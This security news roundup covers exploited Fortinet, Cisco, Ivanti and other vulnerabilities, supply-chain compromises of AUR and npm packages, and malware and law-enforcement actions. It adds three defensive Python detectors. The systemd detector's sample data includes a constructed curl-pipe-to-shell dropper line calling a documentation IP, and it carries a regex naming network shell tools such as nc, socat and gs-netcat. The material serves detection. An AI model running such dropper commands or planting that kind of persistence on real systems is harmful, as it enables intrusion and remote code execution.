Threat actors are actively exploiting multiple high-severity vulnerabilities affecting Fortinet, Cisco, LiteSpeed, Ivanti, Palo Alto Networks, and Oracle products. Fortinet FortiSandbox flaws CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089 are being targeted and could allow privilege escalation and remote code execution.
Fortinet also warned that CVE-2025-61624 has been exploited in the wild. It should be noted that security researchers reported a data leak, referred to as ‘FortiBleed,’ that has exposed VPN login credentials for nearly 74,000 Fortinet/FortiGate firewall systems worldwide. Security researcher Bob Diachenko found a database containing usernames, email addresses, and plaintext passwords that appeared to be valid. The leaked data reportedly includes credentials linked to major organizations such as Chevron, Samsung, Foxconn, Comcast, AT&T, Mercedes-Benz, and Toyota. Fortinet has yet to comment on the reported breach allegations.
Cisco patched the actively exploited zero-day CVE-2026-20262 in Catalyst SD-WAN Manager, which allows low-privilege attackers to gain root-level command execution. In addition, CISA reported active exploitation of CVE-2026-54420 in the LiteSpeed cPanel Plugin, which can enable attackers with FTP or web shell access to escalate privileges to root on affected shared hosting servers. The cybersecurity agency has also flagged as exploited a missing authentication issue (CVE-2026-20253) in Splunk Enterprise, and an improper access control vulnerability (CVE-2026-48907) affecting Widget Factory Joomla Content Editor.
Furthermore, an OS command injection vulnerability (CVE-2026-10520) in Ivanti Sentry, CVE-2026-35273 in Oracle’s PeopleSoft PeopleTools, and CVE-2026-0257 in Palo Alto Networks’ GlobalProtect are also being abused in the wild.
F5 has released out-of-band security updates for NGINX to fix multiple security issues, including CVE-2026-42530 and CVE-2026-42055. The flaws affect specific NGINX modules and could allow unauthenticated remote attackers to cause a denial of service (DoS) or potentially execute arbitrary code on vulnerable systems using non-default configurations. Organizations running affected NGINX deployments should apply the latest security updates as soon as possible.
ESET researchers have discovered two previously undocumented Windows variants of the SprySOCKS backdoor, a malware family that was previously observed targeting only Linux systems. The malware is linked to FishMonger, a cyber espionage group believed to be operated by Chinese contractor I-SOON.
ESET has also observed DeadLock ransomware expanding its use of Polygon blockchain smart contracts. Previously, the group used smart contracts only to rotate chat proxy server addresses. DeadLock has now introduced a new contract containing its Data Leak Site (DLS) entries. This appears to be the first known use of blockchain-hosted DLS content by a ransomware group.
A long-running cyber-espionage campaign, dubbed ‘Operation Highland,’ has been linked to the Chinese threat group tracked as Velvet Ant. The attackers reportedly maintained access to a large organization's network for nearly 10 years. After gaining an initial foothold, the attackers deployed a modified GS-Netcat reverse shell disguised as a legitimate system component. The malware provided encrypted remote access and achieved persistence through malicious systemd services or startup script modifications.
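Persistence through a systemd unit that points at a binary masquerading as a system component is something defenders can hunt for without any vendor tooling. The script below is an added example (not Velvet Ant's tooling and not any vendor's detection content): it parses unit files and flags ExecStart commands that run from writable locations, from hidden directories, or that embed download-and-execute one-liners. The unit texts, the name 'systemd-helperd' and the 198.51.100.7 address are constructed for the demonstration.

```python
"""Flag systemd unit files that look like rogue persistence.

Added example, not code from any vendor or threat report. Sample unit files
below are constructed; 'systemd-helperd' and 198.51.100.7 are illustrative.
"""
import re
import shlex

# Where binaries installed by the package manager normally live
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/bin/", "/sbin/", "/lib/")
# Writable or user-controlled locations a packaged service has no business in
SUSPICIOUS_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Ingredients of download-and-execute or tunnelling one-liners
DROPPER_TOKENS = re.compile(
    r"\b(curl|wget|base64|ncat|nc|gs-netcat|socat|python3? -c|bash -i)\b")


def parse_unit(text: str) -> dict:
    """Minimal INI parse: {section: {key: [value, ...]}}; keys may repeat."""
    sections, cur = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            sections.setdefault(cur, {})
        elif "=" in line and cur is not None:
            key, value = line.split("=", 1)
            sections[cur].setdefault(key.strip(), []).append(value.strip())
    return sections


def exec_path(cmdline: str) -> str:
    """First word of an Exec* line, with systemd's prefix characters removed."""
    try:
        first = shlex.split(cmdline)[0] if cmdline else ""
    except ValueError:          # unbalanced quotes: treat the raw first token as the path
        first = cmdline.split()[0]
    return first.lstrip("-@+!:")


def audit_unit(name: str, text: str) -> list:
    """Return human-readable findings for one unit file (empty list if clean)."""
    findings = []
    service = parse_unit(text).get("Service", {})
    for cmd in service.get("ExecStartPre", []) + service.get("ExecStart", []):
        path = exec_path(cmd)
        if path.startswith(SUSPICIOUS_PREFIXES):
            findings.append(f"{name}: ExecStart runs from writable/user location {path}")
        elif not path.startswith(TRUSTED_PREFIXES):
            findings.append(f"{name}: ExecStart binary outside packaged paths: {path}")
        # A hidden directory under /usr/lib is a classic disguise for a rogue binary
        if any(part.startswith(".") and part not in (".", "..") for part in path.split("/")):
            findings.append(f"{name}: hidden path component in {path}")
        if DROPPER_TOKENS.search(cmd):
            findings.append(f"{name}: dropper/tunnel tooling in command line: {cmd}")
    return findings


def audit_all(units: dict) -> dict:
    """Audit a {unit_name: unit_text} mapping; returns {unit_name: findings}."""
    return {name: audit_unit(name, text) for name, text in units.items()}


# Constructed sample units: one legitimate, one disguised, one oneshot dropper.
SAMPLE_UNITS = {
    "ssh.service": "[Unit]\nDescription=OpenBSD Secure Shell server\n"
                   "[Service]\nExecStart=/usr/sbin/sshd -D\n"
                   "[Install]\nWantedBy=multi-user.target\n",
    "systemd-helperd.service": "[Unit]\nDescription=System Helper Daemon\n"
                               "[Service]\nExecStart=/usr/lib/.cache/systemd-helperd -l\n"
                               "Restart=always\n[Install]\nWantedBy=multi-user.target\n",
    "update-check.service": "[Service]\nType=oneshot\n"
                            "ExecStart=/bin/sh -c \"curl -s http://198.51.100.7/x | base64 -d | sh\"\n",
}

if __name__ == "__main__":
    for unit, hits in audit_all(SAMPLE_UNITS).items():
        print(unit, "->", hits or "clean")
```

On a live host, feed it the contents of /etc/systemd/system, /usr/lib/systemd/system and each user's ~/.config/systemd/user; a path check alone does not catch a binary dropped into /usr/bin, so pair it with package-manager ownership checks (for example, `pacman -Qo` or `dpkg -S` on every ExecStart path).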
In a separate China-linked operation, a cyber espionage group tracked as UNC6508 targeted vulnerable REDCap servers at a North American medical research institution, deploying custom malware and stealing sensitive data over a period of more than a year. GTIG believes the attackers first compromised the organization in September 2023 after probing outdated REDCap installations. The intrusion remained undetected until November 2025.
Poland has warned that a Belarus-linked hacking group is expanding its cyberattacks to target personal Gmail accounts belonging to senior public figures and their family members. Poland’s national cybersecurity agency CERT Polska says that the group known as GhostWriter has increasingly focused on Gmail users since March of this year. Previously, the hackers mainly targeted work accounts and email services provided by Polish companies.
A large-scale malware campaign has been targeting Arch Linux users through the Arch User Repository (AUR). More than 400 packages were reportedly modified to distribute a credential-stealing malware and Linux rootkit. A threat actor impersonated a trusted AUR maintainer and gained control of numerous packages. The attacker added malicious installation scripts that downloaded and executed a rogue npm package called ‘atomic-lockfile’ during software installation.
In yet another large-scale supply-chain attack, more than 140 npm packages linked to the Mastra ("@mastra/*") open-source AI development framework were compromised. Attackers hijacked a legitimate npm account belonging to a former Mastra contributor and published 144 malicious package versions within 88 minutes. The compromised packages contained a dependency called ‘easy-day-js,’ a fake version of the popular date library Day.js. The package downloaded and executed malware during installation.
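Both the AUR and the Mastra incidents rely on the same two ingredients: a dependency whose name resembles a well-known library, and an install-time script that runs the moment the package is fetched. The following is an added example (not Mastra's, npm's, or the Day.js project's code) of a small audit over package.json documents that surfaces both. The package.json entries are constructed; apart from 'easy-day-js' and 'dayjs', the package names and the popular-package allowlist are hypothetical.

```python
"""Audit npm package manifests for install-time hooks and lookalike names.

Added example, not code from npm, Mastra or Day.js. Sample manifests are
constructed; 'lodahs' and the POPULAR allowlist are hypothetical.
"""
import difflib
import json

# Lifecycle scripts npm runs automatically during `npm install`
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Names worth protecting against typosquats (hypothetical; derive yours from lockfile history)
POPULAR = {"dayjs", "lodash", "express", "axios", "chalk"}
# Filler tokens attackers wrap around a real name: 'easy-day-js', 'node-lodash' and so on
FILLER = ("easy", "simple", "real", "official", "node", "lib", "js")


def install_scripts(pkg: dict) -> dict:
    """Install-time hooks declared in a package.json dict."""
    scripts = pkg.get("scripts") or {}
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def normalize(name: str) -> str:
    """Collapse separators so 'easy-day-js' and 'easy_day.js' compare equal."""
    return name.lower().replace("-", "").replace("_", "").replace(".", "")


def _only_filler(s: str) -> bool:
    """True if s is empty or made solely of FILLER tokens (greedy left-to-right)."""
    while s:
        for f in FILLER:
            if s.startswith(f):
                s = s[len(f):]
                break
        else:
            return False
    return True


def lookalike_of(name: str, popular=POPULAR, cutoff: float = 0.8):
    """Popular package this name imitates, or None.

    Rule 1: the popular name plus filler tokens ('easy-day-js' -> 'dayjs').
    Rule 2: a near-miss spelling by edit similarity ('lodahs' -> 'lodash').
    """
    if name in popular:
        return None
    n = normalize(name)
    best, best_ratio = None, 0.0
    for p in sorted(popular):
        np_ = normalize(p)
        if np_ in n and _only_filler(n.replace(np_, "", 1)):
            return p
        ratio = difflib.SequenceMatcher(None, n, np_).ratio()
        if ratio > best_ratio:
            best, best_ratio = p, ratio
    return best if best_ratio >= cutoff else None


def audit(packages: list) -> list:
    """One finding per package that declares install hooks or imitates a popular name."""
    findings = []
    for pkg in packages:
        name = pkg.get("name", "?")
        hooks, look = install_scripts(pkg), lookalike_of(name)
        if hooks or look:
            findings.append({"name": name, "version": pkg.get("version"),
                             "install_hooks": hooks, "lookalike_of": look})
    return findings


# Constructed package.json documents: one genuine, one wrapped lookalike with a
# postinstall hook, one misspelling, and one legitimate name that merely contains
# a popular name (must not be flagged).
SAMPLE_MANIFESTS = [
    '{"name": "dayjs", "version": "1.11.10", "scripts": {"test": "jest"}}',
    '{"name": "easy-day-js", "version": "1.0.3", "scripts": {"postinstall": "node ./setup.js"}}',
    '{"name": "lodahs", "version": "4.17.21"}',
    '{"name": "express-session", "version": "1.18.0"}',
]


def load_samples() -> list:
    return [json.loads(m) for m in SAMPLE_MANIFESTS]


if __name__ == "__main__":
    for f in audit(load_samples()):
        print(f)
```

Run it over every package.json under node_modules after a fresh install; a postinstall hook is common in legitimate native-addon packages, so treat the combination of a hook and a lookalike name as the high-confidence signal. The structural mitigation is to install with `npm ci --ignore-scripts` in CI so that no lifecycle script runs at all unless explicitly allowed.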
Security researchers discovered a malware campaign involving at least 15 malicious plugins on the JetBrains Marketplace. The plugins were designed to steal AI API keys from developers and have been downloaded nearly 70,000 times. The plugins, published under seven different vendor accounts, were masked as AI coding assistants, code-review tools, and Git utilities.
Microsoft discovered a Windows-based cryptocurrency clipper active since February 2026. The malware uses Windows Script Host and ActiveX to start a built-in Tor proxy and communicate with a hidden command-and-control server. It steals clipboard data, captures screenshots, and replaces copied cryptocurrency wallet addresses with attacker-controlled ones to redirect funds.
The DragonForce ransomware group has expanded its malware toolkit with a new tool that hides command-and-control (C&C) communications inside Microsoft Teams infrastructure. The malware, named Backdoor.Turn, is believed to be the first known malware observed in real-world attacks abusing Microsoft Teams TURN relay servers for stealthy communications.
Check Point Research discovered a malware campaign that uses fake cryptocurrency tools to trick users into downloading malicious software. The campaign targets crypto traders and online gamblers by promoting fake Solana and Pump.fun bots, as well as gambling prediction tools, through phishing sites, GitHub, SourceForge, YouTube, and even news articles. The malware, a Rust-based clipboard hijacker for Windows and macOS, replaces copied cryptocurrency wallet addresses with attacker-controlled ones, allowing criminals to steal digital assets.
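Both the Windows clipper above and this Rust-based hijacker work the same way: the user copies a wallet address, and a fraction of a second later the clipboard holds a different address of the same asset without any user action. That timing signature is detectable. The code below is an added example (not Microsoft's or Check Point's analysis code and not reading a real clipboard) that classifies clipboard values by asset and flags a same-asset change that occurs within a short window. The event list is constructed; the first BTC value is the well-known BIP173 example address, the other addresses are made up.

```python
"""Detect clipper-style wallet address substitution in a clipboard event stream.

Added example; not vendor analysis code and not a live clipboard monitor.
Events below are constructed (timestamps in seconds, clipboard text).
"""
import re

# Coarse address shapes: enough to classify, not to validate checksums.
# SOL is checked last because 32-34 character base58 strings overlap with BTC legacy.
ADDRESS_PATTERNS = {
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "BTC": re.compile(r"^(bc1[ac-hj-np-z02-9]{25,87}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "SOL": re.compile(r"^[1-9A-HJ-NP-Za-km-z]{32,44}$"),
}


def classify(value: str):
    """Asset label for a clipboard value that looks like a wallet address, else None."""
    v = value.strip()
    for asset, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(v):
            return asset
    return None


def detect_substitutions(events, window_s: float = 2.0) -> list:
    """events: time-ordered iterable of (timestamp_seconds, clipboard_text).

    A finding is a same-asset address change within window_s of the previous
    clipboard update: a human copying two different addresses that quickly is
    implausible, a clipper rewriting the copied one is not.
    """
    findings = []
    prev_t, prev_v, prev_asset = None, None, None
    for t, v in events:
        asset = classify(v)
        if (asset is not None and asset == prev_asset
                and v.strip() != prev_v.strip() and t - prev_t <= window_s):
            findings.append({"asset": asset, "original": prev_v.strip(),
                             "replacement": v.strip(), "delay_s": t - prev_t})
        prev_t, prev_v, prev_asset = t, v, asset
    return findings


# Constructed clipboard history. The ETH pair shows the clipper signature; the
# BTC pair is two addresses copied 7 seconds apart, i.e. ordinary user behaviour.
SAMPLE_EVENTS = [
    (0.00, "invoice #4471 due Friday"),
    (12.40, "0x" + "ab" * 20),           # user copies an ETH address (constructed)
    (12.55, "0x" + "cd" * 20),           # a different address appears 150 ms later
    (90.00, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"),
    (97.30, "bc1qqpzry9x8gf2tvdw0s3jn54khce6mua7lqpzry9"),  # constructed, 7 s later
]

if __name__ == "__main__":
    for hit in detect_substitutions(SAMPLE_EVENTS):
        print(f"{hit['asset']} address replaced after {hit['delay_s']:.3f}s: "
              f"{hit['original']} -> {hit['replacement']}")
```

To use this against a real host, feed it clipboard change notifications from the OS (clipboard-listener APIs exist on Windows, macOS and X11/Wayland) and tune the window to the process-injection latency seen in your environment; for end users the practical countermeasure remains verifying the pasted address against the intended one before sending.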
International law enforcement agencies disrupted the SocGholish malware network by cleaning nearly 15,000 infected WordPress websites and shutting down 106 related servers and domains. The operation, called Operation Endgame, targeted infrastructure linked to the Russian cybercrime group known as Evil Corp. SocGholish malware tricks users into downloading fake browser updates from compromised websites, helping criminals spread malware and ransomware.
Oleksii Oleksiyovych Lytvynenko, a Ukrainian national, has pleaded guilty to conspiracy charges linked to the notorious Conti ransomware operation. Prosecutors said Lytvynenko participated in attacks that infiltrated victim networks, stole sensitive data, and encrypted systems to extort Bitcoin ransom payments. Lytvynenko also admitted to helping develop a loader used to deploy malware while working with a team operated by another Conti member.
Law enforcement agencies have taken down the cryptocurrency laundering service known as AudiA6, which authorities say was used by ransomware groups and other cybercriminals to launder more than $380 million in illicit funds. AudiA6 operated between 2022 and 2025 as a cryptocurrency mixing service that helped criminals hide the origin of stolen funds. The platform allegedly moved money through complex transaction chains before returning it to users for a commission fee.
The FBI and partners dismantled Outsider Enterprise, a Chinese phishing-as-a-service network that used AI-powered phishing kits and fake websites to steal credit card data and passwords. The operation was linked to over 3.8 million stolen credit card records and $1.9 billion in losses. Authorities seized servers, cryptocurrency, and related infrastructure, while Google filed a lawsuit against the group.
US authorities shut down 13 websites connected to a Chinese espionage campaign targeting current and former US government employees with security clearances. The sites posed as consulting firms offering fake jobs to gain access to sensitive information. Operators allegedly used fake identities, stolen data, AI-generated photos, encrypted messaging apps, and cryptocurrency.
The US Department of Justice seized CFAKE[.]com and SOCFAKE[.]com, websites accused of distributing nonconsensual AI-generated nude images and videos. The platforms allegedly hosted deepfake content featuring politicians, celebrities, athletes, musicians, and royalty. This is believed to be the first public domain seizure under the TAKE IT DOWN Act, which targets nonconsensual intimate imagery and AI-generated deepfakes.
Chinese authorities arrested 67 people linked to Silver Fox, the country’s largest cybercrime group. Operating since mid-2024, the group targeted Chinese-speaking users in China and abroad with malware that could steal passwords, intercept SMS codes, and collect sensitive data.
The arrests took place across five provinces and included malware developers, phishing website operators, and fraudsters. Authorities say Silver Fox mainly targeted employees in businesses and public institutions, especially finance staff.